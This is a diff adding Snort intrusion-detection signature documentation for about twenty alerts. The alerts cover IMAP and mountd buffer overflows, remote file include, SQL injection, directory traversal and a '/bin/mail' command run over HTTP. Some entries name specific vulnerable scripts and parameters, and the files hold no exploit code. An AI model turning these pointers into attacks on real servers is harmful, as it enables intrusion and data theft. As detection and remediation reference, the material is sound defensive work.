+++ b/doc/signatures/1366.txt
@@ -0,0 +1,56 @@
+Rule: 
+
+--
+Sid: 1366
+
+-- 
+Summary: 
+This event is generated when execution of a "mail" command using the path /bin/mail is attempted via HTTP.
+
+-- 
+Impact: 
+Possible intelligence gathering. This may be an attempt to gain information using mail to access sensitive files on a webserver.
+
+-- 
+Detailed Information: 
+This may be an attempt to gain intelligence from sensitive system files on a webserver. This rule generates an event when a "mail" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. 
+
+The "mail" command is used to read and send email on UNIX systems. The rule looks for the "mail" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "mail" command in the URL indicates that an attacker attempted to trick the web server into executing a system command in non-interactive mode i.e. without a valid shell session. 
+
+This rule may also generate an event if it detects this command in an unencrypted HTTP tunneling connection to the server or a shell connection through an exploit of the web server.
+
+-- 
+Attack Scenarios: 
+The attacker can make a standard HTTP request that contains the path to the "mail" command in the URI, which can then return requested files to an external destination.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action:
+Webservers should not be allowed to view or execute files and binaries outside of its designated web root or cgi-bin.
+
+This command may also be requested on a command line should the attacker gain access to the machine. 
+
+Non-essential binaries should be removed from a webserver once it is in production.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3076.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3076
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"unsubscribe" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1126.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+1126
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+In this case, this event indicates an attempt to access the file
+_AuthChangeUrl which may indicate that an exploit attempt has been
+sucessful in changing user information on an IIS host or that an attempt
+has been made to enumerate accounts on an IIS host.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000431.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000431
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "fileBrowserInner.php" using a remote file being passed as the "APP[path][core]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][core]" parameter in the "fileBrowserInner.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000855.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000855
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Professional Home Page Tools" application running on a webserver. Access to the file "class.php" with SQL commands being passed as the "name" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "name" parameter in the "class.php" script used by the "Professional Home Page Tools" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Professional Home Page Tools
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/927.txt
@@ -0,0 +1,62 @@
+SID:
+927
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000387.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+100000387
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "index.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/315.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 315
+
+--
+Summary:
+This event is generated when an attempt is made to escalate privileges remotely using a vulnerability in mountd.
+
+--
+Impact:
+System compromize presenting the attacker with escalated system privileges .
+
+--
+Detailed Information:
+Some implementations of the Network File System (NFS) on Linux systems use a vulnerable version of mountd that is subject to a buffer overflow condition in the logging subsystem.
+
+The mountd logging facility also logs failed attempts to mount shared resources, even if NFS is not enabled on the system. This means that exploitation of this issue is possible wether or not NFS is being used.
+
+Affected Systems:
+	Caldera OpenLinux Standard 1.2
+	RedHat Linux 2.0, 2.1, 3.0.3, 4.0, 4.1, 4.2, 5.0, 5.1
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/121
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
+
+CERT:
+http://www.cert.org/advisories/CA-1998-12.html
+http://www.cert.org/summaries/CS-98-08.html
+
+--
--- /dev/null
+++ b/doc/signatures/3100.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3100
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1398.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1398
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow condition in the dtspcd daemon.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code.
+
+--
+Detailed Information:
+Certain versions of the Common Desktop Environment (CDE) subprocess control service (dtspcd) contain a programming error that allows an attacker to execute arbitrary code.
+
+dtspcd is used to launch remote applications over a network connection. CDE is used on UNIX and Linux systems as a graphical window manager, it was the default X windows interface on Sun systems until the switch to Gnome.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0803
+
+CERT:
+http://www.cert.org/advisories/CA-2002-01.html
+http://www.cert.org/advisories/CA-2001-31.html
+http://www.kb.cert.org/vuls/id/172583
+
+--
--- /dev/null
+++ b/doc/signatures/844.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+844
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2699.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+2699
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure TO_CHAR.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/336.txt
@@ -0,0 +1,70 @@
+Rule:
+Sid:
+336
+--
+Summary:
+This event is generated when an attempt is made to access roots home
+directory in an ftp session.
+
+--
+Impact:
+Serious. Information disclosure.
+
+--
+Detailed Information:
+An ftp command to change directories to root's home directory has been
+made. If roots home directory is world readable and is within the ftp
+root, the contents may be viewed or downloaded in an ftp session.
+
+Under normal ftp usage (by non-root users), this should never occur.  
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Scenario A:
+1. Remote attacker has gained root password/access, or is able to access root's home directory.
+2. Attacker will be able to replace important system files at their will, possibly gaining shell access as root.
+
+Scenario B:
+1. System administrator (root) connects to the system via un-encrypted ftp.
+2. An attacker, listening in on the tcp/ip traffic, gains root's password since it was transmitted in 'clear-text'.
+3. The attacker can now log in as root.
+
+Scenario C:
+1. The ~root directory is world readable.
+2. Sensitive files that may exist in this directory can now be accessed by anyone.
+--
+Ease of Attack:
+Scenario A: depends on how the attacker gained root's password
+Scenario B: trivial for someone on the same network or on the route to the comprimiseable system.
+Scenario C: easy.
+--
+False Positives:
+None Known
+The administrator has legitimately logged into this machine from a remote location. 
+Note: this still has the potential for a security breach (see Scenario B).
+--
+False Negatives:
+None Known
+Accessing other system critical directories other than ~root (for example, /etc, where passwd/shadow files are kept) could indicate the same comprimise.
+--
+Corrective Action:
+ - Dissallow ftp login for root, consider using something more secure than ftp for root file transfers.
+ - Make sure root's home directory is NOT world readable.
+ - Root's password may have been discovered, take apropriate action.
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Jeremy Stashewsky <jstash@omitthis.uvic.ca>
+
+-- 
+Additional References:
+CVE CVE-1999-0082
+RFC 959: File Transfer Protocol http://www.ietf.org/rfc/rfc959.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2573.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2573
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running a web application on Microsoft Internet 
+Information Server (IIS).
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running a web application on Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+The attacker may also be trying to gain administrator access to the 
+host, garner information on users of the system or retrieve sensitive 
+customer information.
+
+Some applications may store sensitive information such as database 
+connections, user information, passwords and customer information in 
+files accessible via a web interface. Care should be taken to ensure 
+these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/266.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+266
+
+--
+Summary:
+This event is generated when spurious DNS traffic is detected on the network. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This event indicates that abnormal DNS traffic has been detected. The implications are varied and careful investigation of the source and destination should be undertaken.
+
+This may be the result of an improperly configured DNS server or it may be an indication that an attack against the DNS server is underway.
+
+--
+Affected Systems:
+Any DNS server.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Simple to Difficult depending on the DNS implementation.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+Keep all DNS software up to date and correctly configured.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2358.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2358
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application Typo3.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+Typo3 contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable ONLY when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	Typo3 Typo3 3.5 b5
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the ONLY variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1112.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1112
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1774.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1774
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000549.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000549
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Custom Datin Biz" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "u" parameter in the "user_view.php" script 
+used by the "Custom Datin Biz" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Custom Datin Biz
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/635.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+635
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1990.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1990
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
